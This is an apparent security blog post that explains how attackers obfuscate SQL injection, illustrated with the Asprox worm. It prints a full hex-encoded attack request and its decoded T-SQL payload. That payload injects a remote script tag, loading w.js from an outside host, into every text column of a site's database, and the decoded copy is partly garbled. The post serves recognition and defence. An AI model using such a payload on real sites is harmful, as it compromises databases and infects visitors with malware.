Security Street Knowledge
  • Obfuscated SQL Injection
  • Two pictures in one

    Take a look at this paragraph. Can you read what it says? All the letters have been jumbled (mixed). Only the first and last letter of ecah word is in the right place:

    Unisg the icndeblire pweor of the hmuan mnid, aocdcrnig to rseecrah at Cmabrigde Uinervtisy, it dseno’t mttaer in waht oderr the lterets in a wrod are, the olny irpoamtnt tihng is taht the frsit and lsat ltteer be in the rhgit pclae. An atactk can be a taotl mses but you can dceode it and sitll raed it whoutit a pboerlm. Take the extra step to raed the mnid of a hcaekr.

    ————————————

    Unfortunately, cyber security attacks may not be as easy to read as the example above.  The bad guys know that we are getting smarter at identifying their web-based attacks.  Therefore in recent times, they have begun obfuscating their malicious payloads.  The obfuscated payloads are uniquely crafted to fool a web application firewall (WAF) or to simply make it difficult for the trained eye to quickly identify a simple SQL injection attack.

    Now take a look at one of the more common obfuscated SQL injection attacks described as “ASCII HEX Encoded/Binary String Automated SQL Injection Attack”. This is an example of a new and growing trend of SQL Web-worms.

     

    ASCII HEX Encoded/Binary String

    GET

    SomeParameter/?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452040542076617

    26368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43757

    2736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797

    36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E64206

    12E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F72

    20622E78747970653D323331206F7220622E78747970653D313636C653E3C736372697074207372633D2268

    7474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743

    E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040

    542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F

    437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1

    ASCII HEX Encoded/Binary String Automated SQL Injection Attack

    1. The attack injects an iFrame into the Website, which then infects visitors with a malicious JavaScript file called w.js

    2. This is not a virus itself but it will download a malicious binary

    3. Now all the attacker has to do is redirect visitors to infected website through other embedded IFRAMES and XSS SCRIPTS

    4. The initial redirect can be accomplished by regular site visitors to an assumed trusted website or via a link distributed as a sales advertisement within an e-mail.

     

    Deobfuscated – Asprox SQL Injection Worm(decoded using Burp Suite)

    DECLARE @S CHAR(@SET @S=ÊST(0xDECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update [‘+@T+’] set [‘+@C+’]=””></title><script src=”http://www0.SomeBadSite.cn/csrss/w.js“></script><!–”+[‘+@C+’] where ‘+@C+’ not like ”%”></title><script src=”http://www0.BadSite.cn/csrss/w.js“></script><!–”’)FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(@));EXì(@S);

     

     

     

    Note: “SQL injection attacks enable malicious users to execute commands or store content in the application’s database.”

  • Comments: Off Category: Uncategorized
  • Tags: , , , , , , , , , , , , , ,

Comments are closed.

cyber3.jpg